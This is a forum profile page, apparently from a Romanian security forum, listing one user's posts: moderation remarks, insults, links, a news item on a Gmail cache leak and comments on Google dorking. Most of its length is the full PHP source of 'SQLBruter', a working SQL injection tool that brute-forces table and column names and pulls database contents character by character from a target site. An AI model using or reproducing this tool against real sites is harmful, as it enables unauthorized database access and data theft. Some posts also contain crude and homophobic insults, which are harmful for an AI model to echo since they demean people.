kw3rln
-
Posts
1019 -
Joined
-
Last visited
Everything posted by kw3rln
-
ban
-
ban
-
http://rstcenter.com/forum/arhiva/
-
Hackerii au lansat Goolag: Scanner bazat pe Google
kw3rln replied to parazitu2009's topic in Stiri securitate
asa stiam si eu anyway programul nu mi se pare ceva exceptional.. is doar niste dorkuri puse.. macar de lucrau la chestia sa nu te baneze google dupa anumite searchuri si sa trebuiasca sa introduci codu de fiecare data -
Hackerii au lansat Goolag: Scanner bazat pe Google
kw3rln replied to parazitu2009's topic in Stiri securitate
http://www.goolag.org/download.html#exe -
THE FABULOUS EXECUTABLE IMAGE ) e total retardat in legatura cu ce zice..parca amu s-o descoperit chestia..e veche demult. mai este chestie: "fooling apache cu execute jpg" ... nu e nimic misto..nimic interesant..e doar configurare apache adaugi in htaccess sau in config la apache ca jpg sa se execute ca php! ideea principala mi=o zis-o moubik pe mess ca n-am stat 40 min sa-l ascult
-
NU MAI BEA ! ai acces unde toti ratatii au acces => esti un ratat: http://www.it-sclub.de/cms/administrator/1923turk.html
-
nu
-
interesant .. "WWW::Mechanize" dar parca prefer "LWP::UserAgent" & "HTTP::Request::Common"
-
dc postezi aci?
-
sa-i spui la bankai de 3 ori pe zi[dim,amiaza si seara] CA II GAY
-
http://www.imsafeonline.ro/windows-xp-ghid-instalare.html Editat de Nemessis: Dati sursa cand copiati un articol taranilor.
-
pt flama: http://www.homosexualitate.ro/neutru.html
-
O problemã înregistratã la un provider de internet din Kuweit a permis cel puþin unui utilizator Gmail sã acceseze conturile altor abonaþi, a anunþat Google. Un utilizator Gmail din Kuweit a declarat cã a avut probleme aproape o zi întreagã când încerca sã îºi acceseze contul. Mai mult decât atât, el a avut acces la informaþiile private ale altor persoane, inclusiv la mesajele din e-mail, „codurile de acces de la intrãrile unor ambasade”, precum ºi la numele de utilizatori ºi parole, a scris Abdulaziz Al-Shalabi, pe CNET News.com. „Cel mai probabil, alte persoane au avut acces, la rândul lor, la datele mele”. Bãrbatul a spus cã s-a logat în peste 30 de conturi ºi a oferit zeci de capturi ale imaginilor de pe ecran, care dovedesc acest lucru. Al-Shalabi a spus cã problema a fost rezolvatã pânã marþi. Jason Freidenfelds, purtãtorul de cuvânt de la Google, a explicat cã un furnizor de servicii internet din Kuweit are probleme cu memoria cache de pe serverele sale, care îi afecteazã atât pe utilizatorii Gmail de aici, cât ºi conturile eBay. Compania a contactat furnizorul de servicii, care oferã o rezolvare temporarã pentru Gmail, a mai precizat el. Freidenfelds a spus cã nu ºtie despre ce companie de telecomunicaþii este vorba sau cât de rãspânditã este problema. Reprezentanþii eBay nu au putut fi contactaþi, deocamdatã, pentru a face comentarii pe aceastã temã. Sursa: Chip.ro
-
nu vad rostul topicului mutat la gunoi
-
http://forums.se-nse.net/index.php?showtopic=16148
-
ban
-
1 avertisment
-
mersi mult ! chiar o sa-l folosesc
-
2 avertismente ! 1. ces cu <<< >>>> la intrebare? 2. ai postat la sectiune gresita
-
1 avertisment
-
<? ############################################### # SQLBruter v1.2 # # (c)oded by Raz0r # # ICQ 502210 # # Greets to InAttack # ############################################### error_reporting(7); set_magic_quotes_runtime(0); @set_time_limit(0); @ini_set("max_execution_time",0); @ini_set("output_buffering",0); @ini_set("default_socket_timeout",5); if (function_exists("ob_start")) ob_start('ob_tidyhandler'); $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\'; $self=basename($HTTP_SERVER_VARS['PHP_SELF']); echo "<html> <head><title>::SQLBruter 1.2 (coded by Raz0r)::</title> <style> Body { ; Font-Family: Arial; ; Font-size: 14px; } INPUT.speed { ; Font-Family: Arial; ; Font-size: 14px; ; Border-style: none; ; BackGround-color: transparent; } TABLE { ; Font-Family: Arial; ; Font-size: 14px; } TD.strconv { ; Font-Family: Verdana; ; Font-size: 4px; } DIV.copyright { ; Font-Family: Arial; ; Font-size: 12px; ; color: SILVER; } </style> </head>"; if ((!isset($_POST['submit'])) && (!isset($_GET['encode']))) { die (" <body onLoad=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'none';\"> <Font Face=\"arial\"> <Center> <H1><Font color=#DDDDDD>SQLBruter 1.2</font></H1> <Form Method=\"Post\"> <Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef> <Tr> <Td> <table><tr><td width=100>URL</td> <td><Input Type=\"text\" Name=\"url_post\" Value=\"http://\" SIZE=40></td></table> <table><tr><td width=100>String</td> <td><Input Type=\"text\" Name=\"string_post\" SIZE=40></td></table> <table><tr><td width=100>log file</td> <td><Input Type=\"text\" Name=\"log_post\" Value=\"log.txt\" SIZE=40></td></table> <table><tr><td width=100>proxy</td><td><Input Type=\"text\" Name=\"proxy_post\" SIZE=40></td></table> <table><tr><td valign=top width=100>mode</td><td> <Input Type=\"radio\" Name=\"mode_post\" Value=\"1\" onClick=\"document.getElementById('1').style.display = 'block'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'none';\">Number of selected rows bruteforce <Input Type=\"radio\" Name=\"mode_post\" Value=\"2\" onClick=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'block'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'none';\">Names of tables bruteforce <Input Type=\"radio\" Name=\"mode_post\" Value=\"3\" onClick=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'block'; document.getElementById('4').style.display = 'none';\">Names of columns bruteforce <Input Type=\"radio\" Name=\"mode_post\" Value=\"4\" onClick=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'block';\">Character-oriented bruteforce</td></table> <div id=\"1\"><table><tr><td width=200>max number of rows to brute</td> <td valign=top> <Input Type=\"text\" Name=\"max_post\" Value=\"20\" SIZE=2></td></table> <table><tr><td width=200>get columns which can output information</td> <td valign=top> <Input Type=\"checkbox\" Name=\"getcols_post\" checked></td></table></div> <div id=\"2\"><table><tr><td width=200>number of the selected rows</td> <td valign=top> <Input Type=\"text\" Name=\"rows1_post\" Value=\"15\" SIZE=2></td></table><table><tr><td width=200>path to the dictionary file</td><td> <Input Type=\"text\" Name=\"dic1_post\" Value=\"dic.txt\" SIZE=20></td></tr><table><tr><td width=200>prefix</td><td> <Input Type=\"text\" Name=\"pref_post\" SIZE=20></td></tr></table></div> <div id=\"3\"><table><tr><td width=200>number of the selected rows</td> <td valign=top> <Input Type=\"text\" Name=\"rows2_post\" Value=\"15\" SIZE=2></td></table><table><tr><td width=200>path to the dictionary file</td><td> <Input Type=\"text\" Name=\"dic2_post\" Value=\"dic.txt\" SIZE=20></td></tr><table><tr><td width=200>name of the table to brute</td><td> <Input Type=\"text\" Name=\"table_post\" SIZE=20></td></tr></table></div> <div id=\"4\"><table title=\"e.g. user(), version(), etc\"><tr><td width=200>DB query</td> <td valign=top> <Input Type=\"text\" Name=\"query_post\" Value=\"user()\" SIZE=20></td></table><table><tr><td width=200>use specific range of chars</td><td> <Input Type=\"text\" Name=\"ot_post\" Value=\"97\" SIZE=3><Input Type=\"text\" Name=\"do_post\" Value=\"122\" SIZE=3></td></tr></table></div> </Td> </Tr> </Table> </Td> </Tr> </Table> <A Href=\"$self?encode\">String converter</A> <Input Type=\"submit\" Value=\"GO!\" name=\"submit\"> <Div class=copyright>[B]Raz0r[/B] 2007 ©</Div></Center> </body> </html>" ); } elseif (isset($_GET['encode'])) { $strconv = $_POST['strconv_post']; $len = strlen($strconv); echo "<body> <Center> <H1><Font color=#DDDDDD>SQLBruter 1.2</font></H1> <Form Method=\"Post\"> <Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=90%> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%> <Tr> <Td> <table><tr><td width=100%> <Input Type=\"text\" Name=\"strconv_post\" Value=\"";if (!empty($strconv))echo $strconv; else echo "enter text here"; echo "\"> <Input Type=\"submit\" name=\"submit_encode\" Value=\"Encode\"> </td></tr></table>"; for ($i = 0; $i < $len; $i++) { $substring = substr($strconv,$i,1); $ascii_code = ord($substring); if ($i == ($len - 1)) $res .= $ascii_code; else $res .= $ascii_code.","; } if (($len > 0) && (isset($_POST['submit_encode']))) $ascii = "CHAR(".$res.")"; else $ascii = null; if (($len > 0) && (isset($_POST['submit_encode']))) $hex = "0x".bin2hex($strconv); else $hex = null; if(isset($_POST['submit_encode'])) $base64 = base64_encode($strconv); if(isset($_POST['submit_encode']))$md5= md5($strconv); if(isset($_POST['submit_encode']))$sha1 = sha1($strconv); echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=90%> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%> <Tr><Td> <table><tr><td width=200>ASCII (SQL syntax)</td> <td><TextArea Name=result1 Cols=\"100\" Rows=\"2\">$ascii</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result1.select();result1.focus()></Td></table> <table><tr><td width=200>HEX</td> <td><TextArea Name=result2 Cols=\"100\" Rows=\"2\">$hex</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result2.select();result2.focus()></Td></table> <table><tr><td width=200>BASE64</td> <td><TextArea Name=result3 Cols=\"100\" Rows=\"2\">$base64</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result3.select();result3.focus()></Td></table> <table><tr><td width=200>MD5</td> <td><TextArea Name=result4 Cols=\"100\" Rows=\"2\">$md5</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result4.select();result4.focus()></Td></table> <table><tr><td width=200>SHA1</td> <td><TextArea Name=result5 Cols=\"100\" Rows=\"2\">$sha1</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result5.select();result5.focus()></Td></table> </Td> </Td> </Tr> </Table> </Td> </Tr> </Table></Td> </Tr> </Table></Td> </Tr> </Table><Div class=copyright> [B]Raz0r[/B] 2007 ©</Div></Center></body></html>"; die; } if (!empty($_POST['url_post'])) $url = $_POST['url_post']; else die("NO URL"); if (!empty($_POST['string_post'])) $string = $_POST['string_post']; else die("NO STRING"); if (!empty($_POST['mode_post'])) $mode = $_POST['mode_post']; else die("NO MODE"); if (!empty($_POST['log_post'])) $log = $_POST['log_post']; if (!empty($_POST['proxy_post']))$proxy = $_POST['proxy_post']; $c = preg_match($proxy_regex,$proxy); if (!$c) die("NOT A VALID PROXY"); $conn = @parse_url($url); $host = $conn["host"]; $path = $conn["path"]; $param = $conn["query"]; if (isset($conn["port"])) $port = $conn["port"]; else $port=80; switch ($mode) { case 1: if (!empty($_POST['max_post'])) $max = $_POST['max_post']; else die("NO MAX NUMBER OF ROWS"); if (!empty($_POST['getcols_post'])) $getcols = $_POST['getcols_post']; if ($getcols == "on") $getcols = 1; else $getcols = 0; show_params(); mode1($url, $string, $max, $getcols); break; case 2: if (!empty($_POST['rows1_post'])) $rows = $_POST['rows1_post']; else die("NO ROWS"); if (!empty($_POST['dic1_post'])) $dic = $_POST['dic1_post']; else die("NO DICTIONARY"); if (!empty($_POST['pref_post'])) $pref = $_POST['pref_post']; show_params(); brute($url, $string, $rows, $dic, FALSE); break; case 3: if (!empty($_POST['rows2_post'])) $rows = $_POST['rows2_post']; else die("NO ROWS"); if (!empty($_POST['dic2_post'])) $dic = $_POST['dic2_post']; else die("NO DICTIONARY"); if (!empty($_POST['table_post'])) $table = $_POST['table_post']; else die("NO TABLE"); show_params(); brute($url, $string, $rows, $dic, $table); break; case 4: if (!empty($_POST['query_post'])) $query = $_POST['query_post']; else die("NO QUERY"); if (!empty($_POST['ot_post'])) $ot = $_POST['ot_post']; else $ot = 97; if (!empty($_POST['do_post'])) $do = $_POST['do_post']; else $do = 122; show_params(); mode4($url, $string, $query, $ot, $do); break; } function mode_name($mode) { $modes = array("Number of selected rows bruteforce", "Names of tables bruteforce", "Names of columns bruteforce", "Character-oriented bruteforce"); return $modes[$mode-1]; } function show_params() { global $url, $string, $mode, $log, $proxy, $max, $rows, $dic, $pref, $table, $query, $ot, $do; $mode_name = mode_name($mode); echo " <body> <script> <!-- var ie=document.all?1:0; var ns=document.getElementById&&!document.all?1:0; function InsertText(text) { if(ie) { document.all.text.value=text; } else if(ns) { document.forms['speed'].elements['text'].value=text; } else alert(\"Your browser is NOT supported\"); } --> </script> <Font Face=\"arial\"> <Center> <H1><Font color=#DDDDDD>SQLBruter 1.2</font></H1> <Table CellSpacing=\"0\" CellPadding=\"0\" width=90%> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%> <Tr> <Td> <Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%> <Tr> <Td> <table><tr><td width=150>[B]URL[/B]</td> <td>".htmlspecialchars($url)."</td></table> <table><tr><td width=150>[B]String[/B]</td> <td>".htmlspecialchars($string)."</td></table> <table><tr><td width=150>[B]Mode[/B]</td><td>".htmlspecialchars($mode_name)."</td></table> "; if (isset($log)) echo "<table><tr><td width=150>[B]Log file[/B]</td> <td>".htmlspecialchars($log)."</td></table>"; if (isset($proxy)) echo "<table><tr><td width=150>[B]Proxy[/B]</td> <td>".htmlspecialchars($proxy)."</td></table>"; switch ($mode) { case 1: echo "<table><tr><td width=150>[B]Rows max number[/B]</td> <td>".htmlspecialchars($max)."</td></table>"; break; case 2: echo "<table><tr><td width=150>[B]Number of the selected rows[/B]</td> <td>".htmlspecialchars($rows)."</td></table>"; echo "<table><tr><td width=150>[B]Dictionary[/B]</td> <td>".htmlspecialchars($dic)." (".checkdic($dic)." words)</td></table>"; if (isset($pref)) echo "<table><tr><td width=150>[B]Prefix[/B]</td> <td>".htmlspecialchars($pref)."</td></table>"; break; case 3: echo "<table><tr><td width=150>[B]Number of the selected rows[/B]</td> <td>".htmlspecialchars($rows)."</td></table>"; echo "<table><tr><td width=150>[B]Dictionary[/B]</td> <td>".htmlspecialchars($dic)." (".checkdic($dic)." words)</td></table>"; echo "<table><tr><td width=150>[B]Table[/B]</td> <td>".htmlspecialchars($table)."</td></table>"; break; case 4: echo "<table><tr><td width=150>[B]Query[/B]</td> <td>".htmlspecialchars($query)."</td></table>"; echo "<table><tr><td width=150>[B]From[/B]</td> <td>".htmlspecialchars($ot)."</td></table>"; echo "<table><tr><td width=150>[B]To[/B]</td> <td>".htmlspecialchars($do)."</td></table>"; break; } echo "</Td></Tr></Table></Td></Tr></Table> "; flush(); } function sendpacket($packet) { global $host, $port, $proxy; if (empty($proxy)) { $ock = @fsockopen(@gethostbyname($host),$port); stream_set_blocking($ock, 0); stream_set_timeout($ock,600); if (!$ock) { echo "No response from ".$host.":80 "; } else { fputs($ock, $packet); $html=""; while (!feof($ock)) { $html.=fgets($ock); } } } else { $parts=explode(":",$proxy); $ock2=@fsockopen($parts[0],$parts[1]); if (!$ock2) { echo "No response from proxy ($proxy)"; } else { fputs($ock2,$packet); $html=""; while ((!feof($ock2)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock2,1); } } } return $html; } function savelogfile($logfile, $mode, $text) { if (!is_file($logfile)) { $s = @fopen($logfile,"w"); fclose($s); chmod($logfile,0777); } $fp = @fopen($logfile,"a"); fputs($fp, "*** SQLBruter's report [".date(" l dS 0f F Y h:i:s A ")."] ***\r\n"); fputs($fp, "[~] ".mode_name($mode)."\r\n".$text."\r\n"); fputs($fp, "____________________________________________________________________\r\n"); fclose($fp); } function checkdic($dic) { $handle = @fopen($dic, "r"); if ($handle) { while (!feof($handle)) { $buffer = fgets($handle, 4096); $x++; } fclose($handle); } else die("INVALID DICTIONARY"); return $x; } function mode1($url, $string, $max, $getcols) { global $log, $proxy, $host, $path, $param; echo "<Form name=\"speed\"><Input Type=\"text\" Name=\"text\" Value=\"Please wait...\" size=100 class=speed DISABLED=yes></Form>"; flush(); for ($i = 0; $i < $max; $i++) { if ($i > 0) $null .=",0"; else $null = "0"; $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); if (strpos($content, $string)>0) { if ($getcols == 1) { for ($z = 1; $z <= ($i+1); $z++) { if ($z > 1) $razor .=",0x72617a3072".bin2hex($z); else $razor = "0x72617a3072".bin2hex($z); } $temp = explode("=", $param); $temp[(sizeof($temp)-1)] = "-1"; $param = implode("=", $temp); $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$razor."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); for ($y = 1; $y <= ($i+1); $y++) { if (strpos($content, ("raz0r".$y)) > 0) $visiblecols[] .= $y; } if (!is_array($visiblecols)) {$nocols = 1;} } echo "<script>InsertText('Done!');</script>"; echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>Number of rows is ".($i+1)." "; if (($getcols == 1) && ($nocols != 1)) {$result = $url." UNION SELECT ".$null."/* Columns ".@implode(",", $visiblecols)." can output information";} elseif ($nocols == 1) $result = $url." UNION SELECT ".$null."/* No columns which can output information"; else $result = $url." UNION SELECT ".$null."/*"; echo $result; echo "</Td></Tr></Table></Td></Tr></Table></Td></Tr></Table></body></html>"; flush(); if (isset($log)) {$result = str_replace(" ", "\r\n", $result); savelogfile($log, 1, $result);} die; } } echo "<script>InsertText('Failed! Try to increase max number of selected rows');</script>"; flush(); } function brute($url, $string, $rows, $dic, $table) { global $log, $proxy, $pref, $host, $path, $param; $x = checkdic($dic); echo "<Form name=\"speed\"><Input Type=\"text\" Name=\"text\" Value=\"\" size=100 class=speed DISABLED=yes></Form>"; flush(); $handle = @fopen($dic, "r"); if ($handle) { $begin_time = time(); if ($table === FALSE) { for ($i = 0; $i < $rows; $i++) { if ($i > 0) $null .=",0"; else $null = "0"; } } else { for ($i = 0; $i < ($rows-1); $i++) { if ($i > 0) $null .=",0"; else $null = "0"; } } for ($i = 0; $i < $x; $i++) { $word = fgets($handle, 4096); $word = ereg_replace("\n", "", $word); $word = ereg_replace("\r", "", $word); $word = trim($word); if (isset($pref)) $word = $pref."_".$word; if (($word !== "") & (!is_numeric($word)) & (!strpos($word,"-")) & (!strpos($word, " "))) { if ($table === FALSE) $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null."%20FROM%20".urlencode($word)."/* HTTP/1.1\r\n"; else $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null.",".urlencode($word)."%20FROM%20".$table."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); $z++; $r++; if ($begin_time + 1 == time()) { $begin_time += 1; $percent = round($z/$x * 100); $words_per_second = $r; $r = 0; echo "<script>InsertText('Completed - ".$percent."%\tCurrent speed - ".$words_per_second." words per second');</script>"; flush(); } elseif ($begin_time + 1 < time()) { $begin_time = time() + 1; $percent = round($z/$x * 100); $words_per_second = $r; $r = 0; echo "<script>InsertText('Completed - ".$percent."%\tCurrent speed - ".$words_per_second." words per second');</script>"; flush(); } if (strpos($content, $string)>0) { if ($table === FALSE) { $result = $url." UNION SELECT ".$null." FROM ".$word."/*"; echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>Table was found - $word $result</Td></Tr></Table></Td></Tr></Table> "; } else { $result = $url." UNION SELECT ".$null.",".$word." FROM ".$table."/*"; echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>Column was found - $word $result</Td></Tr></Table></Td></Tr></Table> "; } flush(); if (isset($log)) { if ($table === FALSE) savelogfile($log, 2, $result); else savelogfile($log, 3, $result); } } } } } } function found($min, $max, $sp, $result) { if (($max-$min)<5) crack($min,$max, $sp, $result); $r = round($max - ($max-$min)/2); $check = ">$r"; if ( check($check, $sp, $result)) { if (!empty($result)) $status = "(".$result.")"; print "<script>InsertText('Now checking > $r $status');</script>"; flush(); found($r,$max, $sp, $result); } else { if (!empty($result)) $status = "(".$result.")"; print "<script>InsertText('Now checking < $r $status');</script>"; flush(); found($min,$r+1, $sp, $result); } } function crack($cmin, $cmax, $sp, $result) { global $ot, $do, $output, $query; $i = $cmin; $check1 = ">0"; if (check($check1, $sp, $result)) { while ($i<=$cmax) { $check = "=$i"; if (!empty($result)) $status = "(".$result.")"; echo "<script>InsertText('Now checking $check $status');</script>"; flush(); if (check($check, $sp, $result)) { $result .= chr($i); $sp++; if (!isset($ot) || !isset($do)) { $ot = 97; $do = 122; } found($ot, $do, $sp, $result); } $i++; } if (((empty($result)) && ($sp == 2)) or (empty($result))) { echo "<script>InsertText('Failed!');</script>"; flush(); die; } else { if (isset($output)) save_result("\n Query ".$query." - ".$result."\n"); echo "<script>InsertText('Not full result ($result). Try to increase the range of chars.');</script>"; flush(); die("</tr></td></table></body></html>"); } } if (((empty($result)) && ($sp == 2)) or (empty($result))) { echo "<script>InsertText('Failed!');</script>"; flush(); die; } else die("<script>InsertText('Done!');</script><Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>[b]$query[/b] - $result</Td></Tr></Table></Td></Tr></Table></body></html>"); } function check($check, $sp, $result) { global $path, $host, $param, $query, $string; $packet = "GET ".$path."?".$param."%20AND%20ascii(lower(substring(".urlencode($query).",".$sp.",1)))".$check." HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $html = sendpacket($packet); if (strpos($html,$string) > 0) return 1; return 0; } function mode4($url, $string, $query, $ot, $do) { global $log, $proxy, $host, $path, $param; echo "<Form name=\"speed\"><Input Type=\"text\" Name=\"text\" Value=\"\" size=100 class=speed DISABLED=yes></Form>"; flush(); found($ot, $do, 1, ""); } if (($mode_post == 2) || ($mode_post == 3) ) echo "<script>InsertText('Completed - 100%');</script>"; echo "</Td></Tr></Table></body></html>"; flush(); ?>
-
"noua" ? she`s a lady...